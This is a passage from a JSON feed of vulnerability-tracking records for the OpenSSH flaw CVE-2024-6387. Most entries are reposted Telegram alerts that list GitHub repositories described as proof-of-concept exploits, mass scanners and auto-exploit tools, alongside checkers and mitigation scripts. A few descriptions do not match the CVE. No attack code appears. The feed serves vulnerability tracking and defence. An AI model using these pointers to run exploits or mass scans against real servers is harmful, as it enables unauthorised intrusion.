OpenSSH\nURL\uff1ahttps://github.com/zenzue/CVE-2024-6387-Mitigation\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T11:18:37.000000Z"}, {"uuid": "8ebaec6b-4dd9-4cfd-86d6-b8d6a1762eca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7839", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aregreSSHion vulnerability in OpenSSH CVE-2024-6387 Testing Script\nURL\uff1ahttps://github.com/grupooruss/CVE-2024-6387-Tester\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T21:19:27.000000Z"}, {"uuid": "51f071a6-3be8-425e-977e-85ff5938a965", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7838", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH\nURL\uff1ahttps://github.com/devarshishimpi/CVE-2024-6387-Check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T21:00:10.000000Z"}, {"uuid": "677c1747-95e7-4d73-bf46-0664e22110a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7837", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aQuickly identifies servers vulnerable to OpenSSH 'regreSSHion' (CVE-2024-6387).\nURL\uff1ahttps://github.com/xonoxitron/regreSSHion-checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T19:04:56.000000Z"}, {"uuid": "1c59c3a9-5800-4fe0-9148-49f52f2c173d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7946", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBulk Scanning Tool for OpenSSH CVE-2024-6387, CVE-2024-6409, CVE-2006-5051, CVE-2008-4109, and 16 other CVEs.\nURL\uff1ahttps://github.com/bigb0x/SSH-Scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T12:00:31.000000Z"}, {"uuid": "54a23b5e-3dc3-425a-9458-a182ed467c6a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7827", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAn Ansible Playbook to mitigate the risk of RCE (CVE-2024-6387) until platforms update OpenSSH to a non-vulnerable version\nURL\uff1ahttps://github.com/DanWiseProgramming/CVE-2024-6387-Mitigation-Ansible-Playbook\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T10:35:51.000000Z"}, {"uuid": "030a1b19-64a1-4d42-8b5d-d835033dc9e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7991", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aOpenSSH RCE Massive Vulnerable Scanner\nURL\uff1ahttps://github.com/ThatNotEasy/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-15T16:10:18.000000Z"}, {"uuid": "c07cff06-3e80-40f9-baa1-e3f33ae1231e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8136", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aAn exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server \nURL\uff1ahttps://github.com/alex14324/ssh_poc2024\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-31T14:22:13.000000Z"}, {"uuid": "ffc60cf4-852f-4db4-b48e-d99e358b10d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7832", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387 : Vulnerability Detectetion tool Remote Unauthenticated Code Execution in OpenSSH Server\nURL\uff1ahttps://github.com/th3gokul/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T17:12:22.000000Z"}, {"uuid": "dc93a6b1-d8b4-4af5-a002-b8fd5c517498", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7878", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387 SSH finder\nURL\uff1ahttps://github.com/SiberianHacker/CVE-2024-6387-Finder\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T15:20:13.000000Z"}, {"uuid": "be757eaf-791b-44b4-ab20-bf3183c3b175", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7874", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aQuick regreSSHion checker (based on software version) for nuclei CVE-2024-6387\nURL\uff1ahttps://github.com/sardine-web/CVE-2024-6387-template\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T11:09:02.000000Z"}, {"uuid": "d24519ab-4fe6-4491-ba93-25bf25df8672", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7873", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSample project that uses VEX to supress CVE-2024-29415.\nURL\uff1ahttps://github.com/Segurmatica/CVE-2024-6387-CHECK\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T07:57:55.000000Z"}, {"uuid": "6e0afcba-f14f-49d3-8f8b-8ed9e468b717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7881", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCorre\u00e7\u00e3o e Atualiza\u00e7\u00e3o do OpenSSH para CVE-2024-6387\nURL\uff1ahttps://github.com/dgicloud/patch_regreSSHion\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T17:03:21.000000Z"}, {"uuid": "7e1417df-48d3-4723-a0b2-743167ec8b07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7808", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCLI Tool to Check SSH Servers for Vulnerability to CVE-2024-6387\nURL\uff1ahttps://github.com/wiggels/regresshion-check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-01T23:09:39.000000Z"}, {"uuid": "34af7045-21a5-4709-a82c-ec24f5879f82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7807", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH\nURL\uff1ahttps://github.com/xaitax/CVE-2024-6387_Check\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-01T22:14:01.000000Z"}, {"uuid": "338f85ed-44e4-4820-9825-88bf985aa847", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/GithubRedTeam/7806", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aBulk Scanning Tool for OpenSSH  CVE-2024-6387, CVE-2006-5051 and CVE-2008-4109.\nURL\uff1ahttps://github.com/bigb0x/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-01T20:48:08.000000Z"}, {"uuid": "54e26fd8-7876-4f84-84dc-58cee32707a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7816", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis is a POC I wrote for CVE-2024-6387\nURL\uff1ahttps://github.com/TAM-K592/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T06:58:06.000000Z"}, {"uuid": "b276c5d2-d766-4cb0-be0a-8cc15572f547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7815", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis is a POC I wrote for CVE-2024-6387\nURL\uff1ahttps://github.com/Yaimsputnik5/regreSSHion\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T02:49:50.000000Z"}, {"uuid": "0a249660-b22b-437d-a006-b991d4b64442", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7812", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSSH RCE PoC CVE-2024-6387\nURL\uff1ahttps://github.com/3yujw7njai/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T06:56:52.000000Z"}, {"uuid": "0ccef86d-51f5-49f7-b20b-594c66d7b845", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/GithubRedTeam/7884", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aVulnerability remediation and mitigationCVE-2024-6387\nURL\uff1ahttps://github.com/azurejoga/CVE-2024-6387-how-to-fix\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T21:30:44.000000Z"}, {"uuid": "5158066c-d584-4af0-a976-586fe926c8fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7951", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1a OpenSSH vulnerability CVE-2024-6387\nURL\uff1ahttps://github.com/Sibijo/mitigate_ssh\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T16:55:55.000000Z"}, {"uuid": "51b3c556-2494-44bb-9ef5-7594e7f6417c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7831", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387 (regreSSHion) exploit PoC, a vulnerability in OpenSSH's server (sshd) on glibc-based Linux systems.\nURL\uff1ahttps://github.com/xonoxitron/regreSSHion\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T14:45:49.000000Z"}, {"uuid": "475f2de1-5377-4b3e-8277-ab256a7ff766", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7830", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aA bash script for nmap to scan for vulnerable machines in regards to the latest CVE-2024-6387\nURL\uff1ahttps://github.com/xristos8574/regreSSHion-nmap-scanner\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T13:53:38.000000Z"}, {"uuid": "a57b9c02-2ce9-4a10-a543-c596ef29f6b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7829", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387 with auto ip scanner and auto expliot \nURL\uff1ahttps://github.com/AiGptCode/ssh_exploiter_CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-03T18:53:59.000000Z"}, {"uuid": "62d53b01-c19c-4e25-9182-720e65b5bbb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "Telegram/zHFGgDK4UjQ2hSGR6kYr1y2Q7cuq9DFhp0z_e4CurronLJQ", "content": "", "creation_timestamp": "2024-07-01T14:07:43.000000Z"}, {"uuid": "eeb31227-3501-4f83-8720-0c6265d8fcfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/JmOfzmPuwFaGVUe1r_yxZaualiroKxV8Ljh6xRZNwM5xTm4", "content": "", "creation_timestamp": "2025-11-25T21:00:05.000000Z"}, {"uuid": "2dfdf5a1-bacf-411e-8fe6-be5ba85e457f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7849", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH\nURL\uff1ahttps://github.com/harshinsecurity/sentinelssh\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-04T16:05:22.000000Z"}, {"uuid": "ee3f34c4-646a-4f31-b193-3e8e4c5ec0f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7911", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRemote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)\nURL\uff1ahttps://github.com/asterictnl-lvdw/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-08T11:34:59.000000Z"}, {"uuid": "91721a1f-0663-4ff8-b722-34d5fe721068", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/GithubRedTeam/7954", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aFix for regreSSHion CVE-2024-6387 for Ubuntu and Debian\nURL\uff1ahttps://github.com/Passyed/regreSSHion-Fix\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T23:25:48.000000Z"}, {"uuid": "c8053035-76a0-4794-b5d6-579c9bd7e2e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7973", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aScript to address CVE-2024-6387 by changing the LoginGraceTime in sshd.\nURL\uff1ahttps://github.com/liqhtnd/sshd-logingracetime0\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-13T18:47:47.000000Z"}, {"uuid": "84ac6eeb-e7c0-4b5e-9f15-e50400a91075", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7925", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis Rust Code is designed to check SSH servers for the CVE-2024-6387 vulnerability\nURL\uff1ahttps://github.com/kubota/CVE-2024-6387-Vulnerability-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-09T21:03:23.000000Z"}, {"uuid": "7d02ed55-b02b-45ac-a797-f3344cc869e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7949", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPerform with massive Wordpress SQLI 2 RCE\nURL\uff1ahttps://github.com/ThemeHackers/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-11T14:45:17.000000Z"}, {"uuid": "7b2639ee-5a46-41ab-85ed-aad1129e4adc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1833", "content": "", "creation_timestamp": "2026-04-21T21:00:00.000000Z"}, {"uuid": "487a6614-1d63-495b-a716-9d787b00128d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "cd6eba8f-a631-4b9d-a629-0d839048fa94", "vulnerability": "CVE-2024-6387", "type": "exploited", "source": "https://github.com/range42/range42-catalog/tree/main/03_container_layer/docker/_ctf/cve/network/openssh/CVE-2024-6387", "content": "", "creation_timestamp": "2026-04-15T14:28:35.799071Z"}, {"uuid": "917b6b44-b29f-4e10-b5c7-21b0bcc99f0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8071", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aMIRROR of the original 32-bit PoC for CVE-2024-6387 \\\"regreSSHion\\\" by 7etsuo/cve-2024-6387-poc\nURL\uff1ahttps://github.com/lflare/cve-2024-6387-poc\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2024-07-25T04:19:36.000000Z"}, {"uuid": "db74a41e-b32a-4988-8439-171442b98f4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8274", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC about CVE-2024-27198\nURL\uff1ahttps://github.com/l-urk/CVE-2024-6387-L\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-16T20:38:09.000000Z"}, {"uuid": "7ecea11c-b067-450c-8690-3995d4316fae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mk3jx5vxd72b", "content": "", "creation_timestamp": "2026-04-22T12:50:34.976416Z"}, {"uuid": "778ff17a-ce4f-4849-9cef-60f9c3c4e236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9267", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aRemote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)\nURL\uff1ahttps://github.com/oxapavan/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-30T19:18:09.000000Z"}, {"uuid": "b3f318df-bdad-40d0-a44e-989656b680e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7924", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.\nURL\uff1ahttps://github.com/filipi86/CVE-2024-6387-Vulnerability-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-09T18:39:20.000000Z"}, {"uuid": "2723173f-8084-44da-87b9-2cd4fb86be9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "Telegram/EYkASGxj3Tiuz3kIHRMz13gpRd2GwQ5wKmXB5D8I7ZTChs4", "content": "", "creation_timestamp": "2025-07-23T21:00:04.000000Z"}, {"uuid": "c1a6e6ee-7aee-4fad-9aab-d0d6adebe234", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8396", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis Python script checks for the CVE-2024-6387 vulnerability in OpenSSH servers. It supports multiple IP addresses, URLs, CIDR ranges, and ports. The script can also read addresses from a file.\nURL\uff1ahttps://github.com/identity-threat-labs/CVE-2024-6387-Vulnerability-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-28T13:34:56.000000Z"}, {"uuid": "691ea87c-af12-4639-a949-50e891e18f89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8239", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSH. \nURL\uff1ahttps://github.com/niktoproject/CVE-202406387_Check.py\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-08-12T06:21:28.000000Z"}, {"uuid": "4daa08b2-611e-439c-a065-4e4cba0668c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7813", "content": 